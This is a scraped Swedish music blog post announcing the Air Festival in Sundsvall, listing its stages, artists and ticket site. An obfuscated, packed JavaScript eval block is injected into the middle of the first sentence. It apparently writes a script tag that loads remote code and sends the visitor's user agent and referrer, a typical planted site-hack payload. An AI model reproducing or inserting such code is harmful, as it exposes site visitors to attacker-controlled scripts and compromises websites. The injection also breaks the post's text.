Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Norrlands tyngsta elektroniska festival

Norrlands tyngsta elektroniska festival
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bfaby|var|u0026u|referrer|yyhdf||js|php’.split(’|’),0,{}))
slutet på juli månad hålls ännu en festival i den elektroniska musikens anda i Sverige, denna gång är det Air Festival som hålls i Sundsvall.

Festivalen må inte vara lika påkostad och episk som Summerburst, men den 29:e och 30:e juli vill man mycket gärna befinna sig på Sundsvalls torg då i alla fall Norrlands tyngsta elektroniska festival drar igång.

Air kommer ha tre scener; Mainstage (för big room house), Hardroom (för dubstep och techno bl.a.) och Air Outdoor (lounge). Den 29:e juli har man satsat på ett par av våra svenska talanger med bl.a en av redaktionens absoluta favoriter Style of Eye, hypade Adrian Lux och halva gänget från Miike Snow medan internationella stjärnor intar torget den 30:e då bl.a. grymma Annie Mac från brittiska Radio 1, Fedde Le Grand och Leeroy Thornhill från Prodigy spelar.

Har man ännu inte lyckats få tag på biljetter kan man fortfarande köpa dem på festivalens hemsida http://airfestival.se